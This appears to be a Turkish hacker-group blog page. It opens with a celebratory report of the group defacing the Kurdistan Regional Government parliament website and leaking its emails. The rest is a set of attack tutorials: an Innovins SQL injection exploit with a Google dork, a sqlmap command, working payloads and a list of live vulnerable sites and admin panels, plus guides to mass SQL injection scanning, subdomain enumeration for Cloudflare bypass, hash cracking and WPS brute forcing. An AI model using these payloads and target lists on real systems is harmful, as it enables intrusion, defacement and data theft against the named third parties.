Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler

Türk hackerlar gayrimeşru referandumla Türkiye'nin de güneydoğusuna göz diken IKYB'nin meclis sitesini hackledi. Sitedeki yazışmaları ele geçirdi.

Hukuksuz referandumla Irak'ı parçalamaya götüren ve sözde bağımsızlık referandumundan Türkiye'nin güneydoğusuna da göz diken Irak Bölgesel Kürt Yönetimi'ne (IKBY), Türk hackerlar siber operasyon düzenledi. 

Turkz Hacker Grubu, IKBY Parlamentosu'na ait verileri ele geçirdiğini duyurdu ve bazı mailleri yayınladı. Söz konusu mailler arasında Türkiye'ye karşı görev almak isteyen provokatörlerin de mailleri görüldü.

Türkye düşmanlarına karşı siber operasyonlara devam edeceğini belirten Turkz Hacker Grubu, terör örgütü PKK'ya hizmet eden bir hacker grubunu da hackledi. 
Türk hackerlar siber operasyonu böyle duyurdu:

KAYNAK: 

http://www.turkz.org/Forum/

http://www.theworldnews.net/

http://www.4haber.com

http://www.swe-turk.com/

İcratler :

site: http://www.kurdistan-parliament.org/
zone: http://zone-h.org/mirror/id/30298398
zone: http://defacers.org/view->437386

Not: Cloudflareden Dolayı Yönlendirme Görünmemektedir

site: http://www.kurdishack.com/

zone: http://mirror-h.org/browse/972571/

zone: http://www.aljyyosh.org/mirror.php?id=204823

zone: http://defacers.org/view->437385

zone: http://archive.is/iHLwz

zone: http://archive.is/iHLwz/image

Detaylar: 

http://www.turkz.org/Forum

https://pastebin.com/KfHLfEam

Kali Linux Sql İnjection Server Scanner

Selamun Aleyküm ... 

Mazda Gibi Bir Hedef Sİtemız Var Arkadaslar, Cms Joomla

Hedefde Açık Bulunamadıgı Zaman Aynı İp Adresı Üzerındekı Siteler Taranır.

Serversqlscan'da Bu Yuzden Var,Pprogramın Mantıgı Çok Basıt İp adresini Giriyosunuz Buldugu Acıkları Kayit Edecegı Dosya Adını Belırtıyosunuz Beklıyosunuz.. Tool Sizin İçin Bing Arama Motoru Üzerinde İp Adresindeki Siteleri Bulup Sonuna Meta Karakter Olan ' Tek Tırnagı Atiyor Bulursa Gösterip Kayıt Ediyor :) 

Video:

Open Source: https://paste.ubuntu.com/25485392/

Innovins Sql İnjection Vulnerability

[CODE]#################################################################################

# Exploit Title: Innovins Sql İnjection Vulnerability

# Author : Sipahiler & TURKZ.org

# Google Dork : intext:"Developed by Innovins" & inurl:id=

# Tested on : Kali Linux 2017.1 Chrome, Firefox

# Data : 2017-09-05

# Blog : http://www.trazer.org/

# Forum : http://www.turkz.org/Forum/     

#################################################################################

Tutorial :

[+] Dorking İn Google Or Other Search Enggine

[+] Open Target

[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)

    Type: boolean-based blind

    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query

    Title: MySQL UNION query (NULL) - 6 columns

    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :

http://www.charlstondsouza.com/event1.php?id=11

http://www.pehl.co.in/page.php?id=17

http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php

http://pehl.co.in/admin/login.php

http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel

References:

http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/

https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Kali Linux Massive SQL injection Scanner

 Selamun Aleyküm ...

Sqliv Verilen dork'tan birden fazla web sitesini arar ve sonuçları birer birer tarar:

Kurulum:

git clone https://github.com/Hadesy2k/sqliv.git

cd sqliv

ls

python2 setup.py -i

python sqliv.py

Kullanim : 

Python sqliv.py - d < SQLI  DORK >  - e < ARAMA  MOTORU >   

örnek: python sqliv.py - d "inurl:index.php?id= site:IT" -e google 

Isteğe bağlı bağımsız değişkenler:
-h, --help bu yardım mesajını gösterir ve çıkar
-d inurl:SQL enjeksiyon dork
-e google arama motoru [Google şimdilik]
-p arama motorunda aramak için web sitelerinin sayısı 100
-t www.example.com tarama hedef web sitesini
-r ters etki alanı (reverse ip)

Video: 

Kali Linux Dnsmap - Subdomain Enumeration of Website in

Selamun Aleyküm ... 

 

Dnsmap

Paul Craig'in kurduğu "The Thief No One Saw" adlı kurgusal hikayeden esinlenilerek, Dnsmap ilk olarak 2006'da piyasaya sürüldü ve “Stealing the Network – How to 0wn the Box”. Başlıklı kitaptan esinlenildi.

Dnsmap esas olarak pentester tarafından altyapı güvenliği değerlendirme/numaralandırma aşamasında bilgi toplama sırasında kullanılmak üzere tasarlanmıştır. Dnsmap Numaralandırma aşamasında, genellikle hedef şirketin IP netblocks, alt alan adlarını keşfetmek için kullanilir, hatta alt alan adlarını tespit ettigi için bu yöntem cloudflare bypass içinde kullanılır.

Genel Kullanimi : dnsmap <hedef alan adi>

Sonuç:

Dnsmap kullanim örnekleri;

Hedefi bir kelime (wordlist) listesi kullanarak taramak için ;

dnsmap example.com -w /root/Desktop/wordlisteniz.txt

yada: dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

Dnsmap-bulk Kullanim Örnegi;

Birden fazla alan adlarını (domains.txt) içeren bir dosya oluşturun ve bunu dnsmap-bulk.sh 'ye gönderin

 örnek: dnsmap-bulk.sh /root/Desktop/ domains.txt

Kali Linux RED HAWK - Easy Hacking Tools

Selamun Aleyküm ...

Red Hawk Bilgi Toplama, Güvenlik Açığı Taramak İçin Kullanılan Bir Araçtır.

Red Hawk Kullanarak Yapabileceginiz Taramalar :

Temel Tarama
Site Başlığı YENİ
IP Adresi
Web Sunucusu Algılama GELİŞTİRİLMİŞ
CMS Algılama
Cloudflare Algılama
robots.txt Tarayıcı
Whoıs Arama GELİŞTİRİLMİŞ
Geo-IP Arama İp Lokasyon
Afiş Yakala  GELİŞTİRİLMİŞ
DNS Araması
Alt Alan Adı Hesap
Nmap Port Tarama
Alt Etki alanı Tarayıcı GELİŞTİRİLMİŞ
Alt Etki Alanı
IP Adresi
Ters IP Arama ve CMS Algılama GELİŞTİRİLMİŞ
Hostname
IP Adresi
CMS
SQLi Hata Tarayıcı Tabanlı
Blogcular YENİ Görünüm
HTTP Yanıt Kodu
Site Başlığı
Alexa Sıralaması
Etki Alanı Yetki
Sayfa Yetkilisi
Sosyal Bağlantı Tespiti
Grabber Linki
WordPress Tarama YENİ
Hassas Dosyaları Tarama
Sürüm Algılama
Sürüm Güvenlik Açığı Tarayıcısı
Paletli
MX Arama YENİ


Sürüm Bilgileri:
- Version 1.0.0 [11-06-2017]
- Version 1.1.0 [15-06-2017]
- Version 2.0.0 [11-08-2017]


Desteklenen CMS Listesi :
WordPress
Joomla
Drupal
Magento

Kurulum :

git clone https://github.com/Tuhinshubhra/RED_HAWK
Cd RED_HAWK
php rhawk.php
help
fix
fix komutu sıstemınızde bulunan eksık modullerı eksık olanları tespit edip indirir mutlaka kullanın fix komutunu.

VİDEO: 

Kali Linux Hash Buster - Hash Cracker

Selamun Aleyküm ...

Dowloand : https://github.com/UltimateHackers/Hash-Buster/

Blog: http://www.trazer.org/
Forum: http://www.turkz.org/Forum/

Kali Linux Bully WPS Brute Force Attack

Selamun Aleyküm ..

Bully, C'de yazılmış olan WPS kaba kuvvet saldırısının yeni bir uygulamasıdır. WPS spesifikasyonunda (şu an iyi bilinen) tasarım hatasını sömüren kavramsal olarak diğer programlarla özdeştir. Orijinal reaver kodu üzerinde birçok avantajı vardır. Bunlara daha az bağımlılık, geliştirilmiş bellek ve cpu performansı, doğru kullanımı ve daha sağlam seçenekler seti dahildir. Linux üzerinde çalışır ve mimariden bağımsız olarak gömülü Linux sistemlerinde (OpenWrt, vb.) Çalıştırmak için özel olarak geliştirilmiştir.

Bully, anormal senaryoların saptanması ve işlenmesinde çeşitli gelişmeler sağlıyor. Erişim noktalarına karşı çok sayıda satıcıdan ve farklı konfigürasyonlarla, çok başarılı sonuçlar alınarak test edilmiştir.

Wiire'in Pixiewps'inin yüklü olması gerekir. En yeni sürümü şu adreste bulabilirsiniz: https://github.com/wiire/pixiewps.

Gereksinimler :
apt-get -y install build-essential libpcap-dev libssl1.0-dev aircrack-ng pixiewps

Kurulum : git clone https://github.com/aanarchyy/bully

yada : wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip

cd bully*/
cd src/
make
make install

Kullanim: bully <options> interface
yada gui olarak: ./bully.py 

VİDEO: